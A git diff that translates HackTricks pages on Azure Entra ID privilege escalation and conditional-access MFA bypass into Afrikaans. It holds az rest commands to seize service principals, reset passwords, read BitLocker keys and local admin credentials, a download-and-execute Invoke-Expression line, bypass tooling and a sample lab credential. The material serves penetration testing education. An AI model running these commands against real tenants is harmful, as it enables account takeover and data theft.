hierdie toestemming toe om meer eienaars by 'n dienshoof te voeg. Om 'n dienshoof te besit, stel jou in staat om oor sy geloofsbriewe en toestemmings te beheer. ```bash # Add new owner spId="" userId="" az rest --method POST \ - --uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \ - --headers "Content-Type=application/json" \ - --body "{ - \"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\" - }" +--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \ +--headers "Content-Type=application/json" \ +--body "{ +\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\" +}" az ad sp credential reset --id --append # You can check the owners with az ad sp owner list --id ``` - > [!CAUTION] -> After adding a new owner, I tried to remove it but the API responded that the DELETE method wasn't supported, even if it's the method you need to use to delete the owner. So you **can't remove owners nowadays**. +> Nadat ek 'n nuwe eienaar bygevoeg het, het ek probeer om dit te verwyder, maar die API het geantwoord dat die DELETE-metode nie ondersteun word nie, selfs al is dit die metode wat jy moet gebruik om die eienaar te verwyder. So jy **kan nie eienaars vandag verwyder nie**. -### `microsoft.directory/servicePrincipals/disable` and `enable` +### `microsoft.directory/servicePrincipals/disable` en `enable` -These permissions allows to disable and enable service principals. An attacker could use this permission to enable a service principal he could get access to somehow to escalate privileges. - -Note that for this technique the attacker will need more permissions in order to take over the enabled service principal. +Hierdie toestemmings laat toe om diensbeginsels te deaktiveer en te aktiveer. 'n Aanvaller kan hierdie toestemming gebruik om 'n diensbeginsel te aktiveer waartoe hy op een of ander manier toegang kan verkry om voorregte te verhoog. +Let daarop dat die aanvaller vir hierdie tegniek meer toestemmings sal benodig om die geaktiveerde diensbeginsel oor te neem. ```bash bashCopy code# Disable az ad sp update --id --account-enabled false @@ -163,11 +142,9 @@ az ad sp update --id --account-enabled false # Enable az ad sp update --id --account-enabled true ``` - #### `microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials` & `microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials` -These permissions allow to create and get credentials for single sign-on which could allow access to third-party applications. - +Hierdie toestemmings laat toe om akrediteerbare inligting vir enkel aanmelding te skep en te verkry, wat toegang tot derdeparty toepassings kan toelaat. ```bash # Generate SSO creds for a user or a group spID="" @@ -175,176 +152,155 @@ user_or_group_id="" username="" password="" az rest --method POST \ - --uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \ - --headers "Content-Type=application/json" \ - --body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}" +--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \ +--headers "Content-Type=application/json" \ +--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}" # Get credentials of a specific credID credID="" az rest --method POST \ - --uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \ - --headers "Content-Type=application/json" \ - --body "{\"id\": \"$credID\"}" +--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \ +--headers "Content-Type=application/json" \ +--body "{\"id\": \"$credID\"}" ``` - --- -## Groups +## Groepe ### `microsoft.directory/groups/allProperties/update` -This permission allows to add users to privileged groups, leading to privilege escalation. - +Hierdie toestemming stel gebruikers in staat om by bevoorregte groepe gevoeg te word, wat lei tot privilige-eskalasie. ```bash az ad group member add --group --member-id ``` - -**Note**: This permission excludes Entra ID role-assignable groups. +**Let wel**: Hierdie toestemming sluit Entra ID rol-toewysbare groepe uit. ### `microsoft.directory/groups/owners/update` -This permission allows to become an owner of groups. An owner of a group can control group membership and settings, potentially escalating privileges to the group. - +Hierdie toestemming stel jou in staat om 'n eienaar van groepe te word. 'n Eienaar van 'n groep kan groepslidmaatskap en instellings beheer, wat moontlik voorregte na die groep kan opgradeer. ```bash az ad group owner add --group --owner-object-id az ad group member add --group --member-id ``` - -**Note**: This permission excludes Entra ID role-assignable groups. +**Let wel**: Hierdie toestemming sluit Entra ID rol-toewysbare groepe uit. ### `microsoft.directory/groups/members/update` -This permission allows to add members to a group. An attacker could add himself or malicious accounts to privileged groups can grant elevated access. - +Hierdie toestemming laat toe om lede by 'n groep te voeg. 'n Aanvaller kan homself of kwaadwillige rekeninge aan bevoorregte groepe voeg wat verhoogde toegang kan verleen. ```bash az ad group member add --group --member-id ``` - ### `microsoft.directory/groups/dynamicMembershipRule/update` -This permission allows to update membership rule in a dynamic group. An attacker could modify dynamic rules to include himself in privileged groups without explicit addition. - +Hierdie toestemming laat toe om die lidmaatskapreël in 'n dinamiese groep op te dateer. 'n Aanvaller kan dinamiese reëls wysig om homself in bevoorregte groepe in te sluit sonder eksplisiete toevoeging. ```bash groupId="" az rest --method PATCH \ - --uri "https://graph.microsoft.com/v1.0/groups/$groupId" \ - --headers "Content-Type=application/json" \ - --body '{ - "membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")", - "membershipRuleProcessingState": "On" - }' +--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \ +--headers "Content-Type=application/json" \ +--body '{ +"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")", +"membershipRuleProcessingState": "On" +}' ``` +**Let wel**: Hierdie toestemming sluit Entra ID rol-toewysbare groepe uit. -**Note**: This permission excludes Entra ID role-assignable groups. +### Dinamiese Groepe Privesc -### Dynamic Groups Privesc - -It might be possible for users to escalate privileges modifying their own properties to be added as members of dynamic groups. For more info check: +Dit mag moontlik wees vir gebruikers om voorregte te verhoog deur hul eie eienskappe te wysig om as lede van dinamiese groepe bygevoeg te word. Vir meer inligting, kyk: {{#ref}} dynamic-groups.md {{#endref}} -## Users +## Gebruikers ### `microsoft.directory/users/password/update` -This permission allows to reset password to non-admin users, allowing a potential attacker to escalate privileges to other users. This permission cannot be assigned to custom roles. - +Hierdie toestemming stel in staat om die wagwoord van nie-admin gebruikers te herstel, wat 'n potensiële aanvaller in staat stel om voorregte na ander gebruikers te verhoog. Hierdie toestemming kan nie aan pasgemaakte rolle toegeken word. ```bash az ad user update --id --password "kweoifuh.234" ``` - ### `microsoft.directory/users/basic/update` -This privilege allows to modify properties of the user. It's common to find dynamic groups that add users based on properties values, therefore, this permission could allow a user to set the needed property value to be a member to a specific dynamic group and escalate privileges. - +Hierdie voorreg stel in staat om eienskappe van die gebruiker te wysig. Dit is algemeen om dinamiese groepe te vind wat gebruikers byvoeg op grond van eienskapwaardes, daarom kan hierdie toestemming 'n gebruiker toelaat om die nodige eienskapwaarde in te stel om 'n lid van 'n spesifieke dinamiese groep te wees en voorregte te verhoog. ```bash #e.g. change manager of a user victimUser="" managerUser="" az rest --method PUT \ - --uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \ - --headers "Content-Type=application/json" \ - --body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}' +--uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \ +--headers "Content-Type=application/json" \ +--body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}' #e.g. change department of a user az rest --method PATCH \ - --uri "https://graph.microsoft.com/v1.0/users/$victimUser" \ - --headers "Content-Type=application/json" \ - --body "{\"department\": \"security\"}" +--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \ +--headers "Content-Type=application/json" \ +--body "{\"department\": \"security\"}" ``` +## Voorwaardelike Toegang Beleide & MFA omseiling -## Conditional Access Policies & MFA bypass - -Misconfigured conditional access policies requiring MFA could be bypassed, check: +Sleg geconfigureerde voorwaardelike toegang beleide wat MFA vereis, kan omseil word, kyk: {{#ref}} az-conditional-access-policies-mfa-bypass.md {{#endref}} -## Devices +## Toestelle ### `microsoft.directory/devices/registeredOwners/update` -This permission allows attackers to assigning themselves as owners of devices to gain control or access to device-specific settings and data. - +Hierdie toestemming laat aanvallers toe om hulself as eienaars van toestelle aan te dui om beheer of toegang tot toestel-spesifieke instellings en data te verkry. ```bash deviceId="" userId="" az rest --method POST \ - --uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \ - --headers "Content-Type=application/json" \ - --body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}' +--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \ +--headers "Content-Type=application/json" \ +--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}' ``` - ### `microsoft.directory/devices/registeredUsers/update` -This permission allows attackers to associate their account with devices to gain access or to bypass security policies. - +Hierdie toestemming laat aanvallers toe om hul rekening met toestelle te assosieer om toegang te verkry of om sekuriteitsbeleide te omseil. ```bash deviceId="" userId="" az rest --method POST \ - --uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \ - --headers "Content-Type=application/json" \ - --body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}' +--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \ +--headers "Content-Type=application/json" \ +--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}' ``` - ### `microsoft.directory/deviceLocalCredentials/password/read` -This permission allows attackers to read the properties of the backed up local administrator account credentials for Microsoft Entra joined devices, including the password - +Hierdie toestemming laat aanvallers toe om die eienskappe van die geback-up plaaslike administrateurrekening kredensiale vir Microsoft Entra-verbonden toestelle te lees, insluitend die wagwoord. ```bash # List deviceLocalCredentials az rest --method GET \ - --uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials" +--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials" # Get credentials deviceLC="" az rest --method GET \ - --uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \ +--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \ ``` - ## BitlockerKeys ### `microsoft.directory/bitlockerKeys/key/read` -This permission allows to access BitLocker keys, which could allow an attacker to decrypt drives, compromising data confidentiality. - +Hierdie toestemming stel toegang tot BitLocker sleutels in, wat 'n aanvaller in staat kan stel om skywe te ontsleutel, wat data se vertroulikheid in gevaar stel. ```bash # List recovery keys az rest --method GET \ - --uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys" +--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys" # Get key recoveryKeyId="" az rest --method GET \ - --uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key" +--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key" ``` - -## Other Interesting permissions (TODO) +## Ander Interessante toestemmings (TODO) - `microsoft.directory/applications/permissions/update` - `microsoft.directory/servicePrincipals/permissions/update` @@ -355,7 +311,3 @@ az rest --method GET \ - `microsoft.directory/applications.myOrganization/permissions/update` {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md index 27bf965d0..8d32013f9 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md @@ -1,93 +1,90 @@ -# Az - Conditional Access Policies & MFA Bypass +# Az - Voorwaardelike Toegang Beleide & MFA Omseiling {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -Azure Conditional Access policies are rules set up in Microsoft Azure to enforce access controls to Azure services and applications based on certain **conditions**. These policies help organizations secure their resources by applying the right access controls under the right circumstances.\ -Conditional access policies basically **defines** **Who** can access **What** from **Where** and **How**. +Azure Voorwaardelike Toegang beleide is reëls wat in Microsoft Azure opgestel is om toegangbeheer tot Azure-dienste en toepassings te handhaaf op grond van sekere **voorwaardes**. Hierdie beleide help organisasies om hul hulpbronne te beveilig deur die regte toegangbeheer onder die regte omstandighede toe te pas.\ +Voorwaardelike toegang beleide **definieer** basies **Wie** kan toegang hê tot **Wat** van **Waar** en **Hoe**. -Here are a couple of examples: +Hier is 'n paar voorbeelde: -1. **Sign-In Risk Policy**: This policy could be set to require multi-factor authentication (MFA) when a sign-in risk is detected. For example, if a user's login behavior is unusual compared to their regular pattern, such as logging in from a different country, the system can prompt for additional authentication. -2. **Device Compliance Policy**: This policy can restrict access to Azure services only to devices that are compliant with the organization's security standards. For instance, access could be allowed only from devices that have up-to-date antivirus software or are running a certain operating system version. +1. **Aanmeld Risiko Beleid**: Hierdie beleid kan ingestel word om multi-faktor verifikasie (MFA) te vereis wanneer 'n aanmeld risiko gedetecteer word. Byvoorbeeld, as 'n gebruiker se aanmeldgedrag ongewoon is in vergelyking met hul gereelde patroon, soos om van 'n ander land aan te meld, kan die stelsel vra vir addisionele verifikasie. +2. **Toestel Nakoming Beleid**: Hierdie beleid kan toegang tot Azure-dienste beperk slegs tot toestelle wat voldoen aan die organisasie se sekuriteitsstandaarde. Byvoorbeeld, toegang kan slegs toegelaat word vanaf toestelle wat opdatering antivirus sagteware het of 'n sekere bedryfstelsel weergawe gebruik. -## Conditional Acces Policies Bypasses +## Voorwaardelike Toegang Beleide Omseilings -It's possible that a conditional access policy is **checking some information that can be easily tampered allowing a bypass of the policy**. And if for example the policy was configuring MFA, the attacker will be able to bypass it. +Dit is moontlik dat 'n voorwaardelike toegang beleid **sekere inligting nagaan wat maklik gemanipuleer kan word, wat 'n omseiling van die beleid toelaat**. En as die beleid byvoorbeeld MFA geconfigureer het, sal die aanvaller in staat wees om dit te omseil. -When configuring a conditional access policy it's needed to indicate the **users** affected and **target resources** (like all cloud apps). +Wanneer 'n voorwaardelike toegang beleid geconfigureer word, is dit nodig om die **gebruikers** wat geraak word en **teikenhulpbronne** (soos alle wolk toepassings) aan te dui. -It's also needed to configure the **conditions** that will **trigger** the policy: +Dit is ook nodig om die **voorwaardes** te configureer wat die beleid sal **aktiveer**: -- **Network**: Ip, IP ranges and geographical locations - - Can be bypassed using a VPN or Proxy to connect to a country or managing to login from an allowed IP address -- **Microsoft risks**: User risk, Sign-in risk, Insider risk -- **Device platforms**: Any device or select Android, iOS, Windows phone, Windows, macOS, Linux - - If “Any device” is not selected but all the other options are selected it’s possible to bypass it using a random user-agent not related to those platforms -- **Client apps**: Option are “Browser”, “Mobiles apps and desktop clients”, “Exchange ActiveSync clients” and Other clients” - - To bypass login with a not selected option -- **Filter for devices**: It’s possible to generate a rule related the used device -- A**uthentication flows**: Options are “Device code flow” and “Authentication transfer” - - This won’t affect an attacker unless he is trying to abuse any of those protocols in a phishing attempt to access the victims account +- **Netwerk**: IP, IP-reekse en geografiese liggings +- Kan omseil word deur 'n VPN of Proxy te gebruik om met 'n land te verbind of te probeer om vanaf 'n toegelate IP-adres aan te meld +- **Microsoft risiko's**: Gebruiker risiko, Aanmeld risiko, Insider risiko +- **Toestel platforms**: Enige toestel of kies Android, iOS, Windows phone, Windows, macOS, Linux +- As “Enige toestel” nie gekies is nie, maar al die ander opsies gekies is, is dit moontlik om dit te omseil deur 'n ewekansige gebruikersagent te gebruik wat nie met daardie platforms verband hou nie +- **Kliënt toepassings**: Opsies is “Blaaier”, “Mobiele toepassings en desktop kliënte”, “Exchange ActiveSync kliënte” en Ander kliënte” +- Om aanmelding te omseil met 'n nie-geselecteerde opsie +- **Filter vir toestelle**: Dit is moontlik om 'n reël te genereer wat verband hou met die gebruikte toestel +- **Verifikasie vloei**: Opsies is “Toestel kode vloei” en “Verifikasie oordrag” +- Dit sal nie 'n aanvaller beïnvloed nie, tensy hy probeer om enige van daardie protokolle in 'n phishing poging te misbruik om toegang tot die slagoffer se rekening te verkry -The possible **results** are: Block or Grant access with potential conditions like require MFA, device to be compliant… +Die moontlike **resultate** is: Blokkeer of Gee toegang met potensiële voorwaardes soos vereis MFA, toestel moet nakom… -### Device Platforms - Device Condition +### Toestel Platforms - Toestel Voorwaarde -It's possible to set a condition based on the **device platform** (Android, iOS, Windows, macOS...), however, this is based on the **user-agent** so it's easy to bypass. Even **making all the options enforce MFA**, if you use a **user-agent that it isn't recognized,** you will be able to bypass the MFA or block: +Dit is moontlik om 'n voorwaarde in te stel gebaseer op die **toestel platform** (Android, iOS, Windows, macOS...), egter, dit is gebaseer op die **gebruikersagent** so dit is maklik om te omseil. Selfs **om al die opsies MFA te laat afdwing**, as jy 'n **gebruikersagent gebruik wat nie erken word nie,** sal jy in staat wees om die MFA of blok te omseil:
-Just making the browser **send an unknown user-agent** (like `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`) is enough to not trigger this condition.\ -You can change the user agent **manually** in the developer tools: +Net om die blaaier **'n onbekende gebruikersagent te laat stuur** (soos `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`) is genoeg om hierdie voorwaarde nie te aktiveer nie.\ +Jy kan die gebruikersagent **handmatig** in die ontwikkelaar gereedskap verander:
- Or use a [browser extension like this one](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en). + Of gebruik 'n [blaaier uitbreiding soos hierdie een](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en). -### Locations: Countries, IP ranges - Device Condition +### Ligging: Lande, IP-reekse - Toestel Voorwaarde -If this is set in the conditional policy, an attacker could just use a **VPN** in the **allowed country** or try to find a way to access from an **allowed IP address** to bypass these conditions. +As dit in die voorwaardelike beleid ingestel is, kan 'n aanvaller net 'n **VPN** in die **toegelate land** gebruik of probeer om 'n manier te vind om toegang te verkry vanaf 'n **toegelate IP-adres** om hierdie voorwaardes te omseil. -### Cloud Apps +### Wolk Toepassings -It's possible to configure **conditional access policies to block or force** for example MFA when a user tries to access **specific app**: +Dit is moontlik om **voorwaardelike toegang beleide te configureer om te blokkeer of te dwing** byvoorbeeld MFA wanneer 'n gebruiker probeer om toegang te verkry tot 'n **spesifieke toepassing**:
-To try to bypass this protection you should see if you can **only into any application**.\ -The tool [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) has **tens of application IDs hardcoded** and will try to login into them and let you know and even give you the token if successful. - -In order to **test specific application IDs in specific resources** you could also use a tool such as: +Om te probeer om hierdie beskerming te omseil, moet jy kyk of jy **slegs in enige toepassing** kan.\ +Die hulpmiddel [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) het **tientalle toepassings-ID's hardgecodeer** en sal probeer om in hulle aan te meld en jou laat weet en selfs die token gee as dit suksesvol is. +Om **spesifieke toepassings-ID's in spesifieke hulpbronne te toets**, kan jy ook 'n hulpmiddel soos gebruik: ```bash roadrecon auth -u user@email.com -r https://outlook.office.com/ -c 1fec8e78-bce4-4aaf-ab1b-5451cc387264 --tokens-stdout ``` +Moreover, dit is ook moontlik om die aanmeldmetode te beskerm (bv. as jy probeer aanmeld vanaf die blaaiers of vanaf 'n desktoptoepassing). Die hulpmiddel [**Invoke-MFASweep**](az-conditional-access-policies-mfa-bypass.md#invoke-mfasweep) voer 'n paar kontroles uit om te probeer om hierdie beskermings te omseil. -Moreover, it's also possible to protect the login method (e.g. if you are trying to login from the browser or from a desktop application). The tool [**Invoke-MFASweep**](az-conditional-access-policies-mfa-bypass.md#invoke-mfasweep) perform some checks to try to bypass this protections also. +Die hulpmiddel [**donkeytoken**](az-conditional-access-policies-mfa-bypass.md#donkeytoken) kan ook vir soortgelyke doeleindes gebruik word, alhoewel dit ononderhoude lyk. -The tool [**donkeytoken**](az-conditional-access-policies-mfa-bypass.md#donkeytoken) could also be used to similar purposes although it looks unmantained. +Die hulpmiddel [**ROPCI**](https://github.com/wunderwuzzi23/ropci) kan ook gebruik word om hierdie beskermings te toets en te sien of dit moontlik is om MFAs of blokke te omseil, maar hierdie hulpmiddel werk vanuit 'n **whitebox** perspektief. Jy moet eers die lys van toepassings wat in die tenant toegelaat is aflaai en dan sal dit probeer om in hulle aan te meld. -The tool [**ROPCI**](https://github.com/wunderwuzzi23/ropci) can also be used to test this protections and see if it's possible to bypass MFAs or blocks, but this tool works from a **whitebox** perspective. You first need to download the list of Apps allowed in the tenant and then it will try to login into them. +## Ander Az MFA Omseilings -## Other Az MFA Bypasses +### Ringtone -### Ring tone - -One Azure MFA option is to **receive a call in the configured phone number** where it will be asked the user to **send the char `#`**. +Een Azure MFA opsie is om **'n oproep te ontvang op die geconfigureerde telefoonnommer** waar die gebruiker gevra sal word om die karakter `#` te **stuur**. > [!CAUTION] -> As chars are just **tones**, an attacker could **compromise** the **voicemail** message of the phone number, configure as the message the **tone of `#`** and then, when requesting the MFA make sure that the **victims phone is busy** (calling it) so the Azure call gets redirected to the voice mail. +> Aangesien karakters net **tones** is, kan 'n aanvaller die **voicemail** boodskap van die telefoonnommer **kompromitteer**, die **toon van `#`** as die boodskap konfigureer en dan, wanneer die MFA aangevra word, seker maak dat die **slagoffer se telefoon besig is** (dit bel) sodat die Azure oproep na die voicemail omgelei word. -### Compliant Devices +### Nakomingstoestelle -Policies often asks for a compliant device or MFA, so an **attacker could register a compliant device**, get a **PRT** token and **bypass this way the MFA**. - -Start by registering a **compliant device in Intune**, then **get the PRT** with: +Beleide vra dikwels vir 'n nakomingstoestel of MFA, so 'n **aanvaller kan 'n nakomingstoestel registreer**, 'n **PRT** token kry en **op hierdie manier die MFA omseil**. +Begin deur 'n **nakomingstoestel in Intune te registreer**, dan **kry die PRT** met: ```powershell $prtKeys = Get-AADIntuneUserPRTKeys - PfxFileName .\.pfx -Credentials $credentials @@ -97,89 +94,72 @@ Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken ``` - -Find more information about this kind of attack in the following page: +Vind meer inligting oor hierdie tipe aanval op die volgende bladsy: {{#ref}} ../../az-lateral-movement-cloud-on-prem/pass-the-prt.md {{#endref}} -## Tooling +## Gereedskap ### [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) -This script get some user credentials and check if it can login in some applications. +Hierdie skrip verkry 'n paar gebruikersakkrediteer en kyk of dit kan aanmeld in 'n paar toepassings. -This is useful to see if you **aren't required MFA to login in some applications** that you might later abuse to **escalate pvivileges**. +Dit is nuttig om te sien of jy **nie MFA benodig om aan te meld in 'n paar toepassings nie** wat jy later mag misbruik om **privileges te verhoog**. ### [roadrecon](https://github.com/dirkjanm/ROADtools) -Get all the policies - +Kry al die beleide ```bash roadrecon plugin policies ``` - ### [Invoke-MFASweep](https://github.com/dafthack/MFASweep) -MFASweep is a PowerShell script that attempts to **log in to various Microsoft services using a provided set of credentials and will attempt to identify if MFA is enabled**. Depending on how conditional access policies and other multi-factor authentication settings are configured some protocols may end up being left single factor. It also has an additional check for ADFS configurations and can attempt to log in to the on-prem ADFS server if detected. - +MFASweep is 'n PowerShell-skrip wat probeer om **in te teken op verskeie Microsoft-dienste met 'n verskafde stel geloofsbriewe en sal probeer om te identifiseer of MFA geaktiveer is**. Afhangende van hoe voorwaardelike toegangbeleide en ander multi-faktor verifikasie-instellings geconfigureer is, kan sommige protokolle eindig as enkel-faktor. Dit het ook 'n addisionele kontrole vir ADFS-konfigurasies en kan probeer om in te teken op die plaaslike ADFS-bediener indien opgespoor. ```bash Invoke-Expression (Invoke-WebRequest -Uri "https://raw.githubusercontent.com/dafthack/MFASweep/master/MFASweep.ps1").Content Invoke-MFASweep -Username -Password ``` - ### [ROPCI](https://github.com/wunderwuzzi23/ropci) -This tool has helped identify MFA bypasses and then abuse APIs in multiple production AAD tenants, where AAD customers believed they had MFA enforced, but ROPC based authentication succeeded. +Hierdie hulpmiddel het gehelp om MFA-omseilings te identifiseer en dan API's in verskeie produksie AAD-tenants te misbruik, waar AAD-klante geglo het dat hulle MFA afgedwing het, maar ROPC-gebaseerde verifikasie suksesvol was. > [!TIP] -> You need to have permissions to list all the applications to be able to generate the list of the apps to brute-force. - +> Jy moet toestemming hê om al die toepassings te lys om die lys van die toepassings te genereer om te brute-force. ```bash ./ropci configure ./ropci apps list --all --format json -o apps.json ./ropci apps list --all --format json | jq -r '.value[] | [.displayName,.appId] | @csv' > apps.csv ./ropci auth bulk -i apps.csv -o results.json ``` - ### [donkeytoken](https://github.com/silverhack/donkeytoken) -Donkey token is a set of functions which aim to help security consultants who need to validate Conditional Access Policies, tests for 2FA-enabled Microsoft portals, etc.. +Donkey token is 'n stel funksies wat daarop gemik is om sekuriteitskonsultante te help wat Conditional Access Policies moet valideer, toetse vir 2FA-geaktiveerde Microsoft-portale, ens. 
git clone https://github.com/silverhack/donkeytoken.git
 Import-Module '.\donkeytoken' -Force
-**Test each portal** if it's possible to **login without MFA**: - +**Toets elke portaal** of dit moontlik is om **in te log sonder MFA**: ```powershell $username = "conditional-access-app-user@azure.training.hacktricks.xyz" $password = ConvertTo-SecureString "Poehurgi78633" -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential($username, $password) Invoke-MFATest -credential $cred -Verbose -Debug -InformationAction Continue ``` - -Because the **Azure** **portal** is **not constrained** it's possible to **gather a token from the portal endpoint to access any service detected** by the previous execution. In this case Sharepoint was identified, and a token to access it is requested: - +Omdat die **Azure** **portaal** **nie beperk nie**, is dit moontlik om 'n **token van die portaal-eindpunt te versamel om toegang te verkry tot enige diens wat deur die vorige uitvoering opgespoor is**. In hierdie geval is Sharepoint geïdentifiseer, en 'n token om toegang daartoe te verkry, word aangevra: ```powershell $token = Get-DelegationTokenFromAzurePortal -credential $cred -token_type microsoft.graph -extension_type Microsoft_Intune Read-JWTtoken -token $token.access_token ``` - -Supposing the token has the permission Sites.Read.All (from Sharepoint), even if you cannot access Sharepoint from the web because of MFA, it's possible to use the token to access the files with the generated token: - +Supposering die token het die toestemming Sites.Read.All (van Sharepoint), selfs al kan jy nie Sharepoint vanaf die web toegang nie weens MFA, is dit moontlik om die token te gebruik om toegang te verkry tot die lêers met die gegenereerde token: ```powershell $data = Get-SharePointFilesFromGraph -authentication $token $data[0].downloadUrl ``` - -## References +## Verwysings - [https://www.youtube.com/watch?v=yOJ6yB9anZM\&t=296s](https://www.youtube.com/watch?v=yOJ6yB9anZM&t=296s) - [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md index 322d18348..99d1c665c 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md @@ -1,29 +1,28 @@ -# Az - Dynamic Groups Privesc +# Az - Dinamiese Groepe Privesc {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -**Dynamic groups** are groups that has a set of **rules** configured and all the **users or devices** that match the rules are added to the group. Every time a user or device **attribute** is **changed**, dynamic rules are **rechecked**. And when a **new rule** is **created** all devices and users are **checked**. +**Dinamiese groepe** is groepe wat 'n stel **reëls** geconfigureer het en al die **gebruikers of toestelle** wat aan die reëls voldoen, word aan die groep toegevoegd. Elke keer as 'n gebruiker of toestel se **attribuut** **gewysig** word, word dinamiese reëls **herkontroleer**. En wanneer 'n **nuwe reël** **gecreëer** word, word al die toestelle en gebruikers **gekontroleer**. -Dynamic groups can have **Azure RBAC roles assigned** to them, but it's **not possible** to add **AzureAD roles** to dynamic groups. +Dinamiese groepe kan **Azure RBAC rolle** aan hulle toegeken hê, maar dit is **nie moontlik** om **AzureAD rolle** aan dinamiese groepe toe te voeg nie. -This feature requires Azure AD premium P1 license. +Hierdie funksie vereis 'n Azure AD premium P1 lisensie. ## Privesc -Note that by default any user can invite guests in Azure AD, so, If a dynamic group **rule** gives **permissions** to users based on **attributes** that can be **set** in a new **guest**, it's possible to **create a guest** with this attributes and **escalate privileges**. It's also possible for a guest to manage his own profile and change these attributes. +Let daarop dat enige gebruiker standaard gaste in Azure AD kan uitnooi, so, as 'n dinamiese groep **reël** **toestemmings** aan gebruikers gee gebaseer op **attribuut** wat in 'n nuwe **gast** **gestel** kan word, is dit moontlik om 'n gast met hierdie attribuut te **skep** en **privileges te verhoog**. Dit is ook moontlik vir 'n gast om sy eie profiel te bestuur en hierdie attribuut te verander. -Get groups that allow Dynamic membership: **`az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table`** +Kry groepe wat dinamiese lidmaatskap toelaat: **`az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table`** -### Example +### Voorbeeld -- **Rule example**: `(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")` -- **Rule description**: Any Guest user with a secondary email with the string 'security' will be added to the group - -For the Guest user email, accept the invitation and check the current settings of **that user** in 